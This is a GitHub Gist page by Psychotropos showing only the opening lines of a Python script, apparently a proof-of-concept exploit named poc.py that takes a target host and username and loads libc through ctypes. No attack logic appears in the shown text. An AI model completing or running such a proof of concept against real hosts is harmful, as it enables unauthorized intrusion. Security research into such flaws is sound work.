Skip to content

Instantly share code, notes, and snippets.

View Psychotropos's full-sized avatar

Ioannis Profetis Psychotropos

View GitHub Profile
import requests
import sys
import hashlib
from ctypes import *
libc = CDLL('libc.so.6')
if __name__ == "__main__":
if len(sys.argv) < 3:
print('[-] Usage: python poc.py <host> <username>')
sys.exit(1)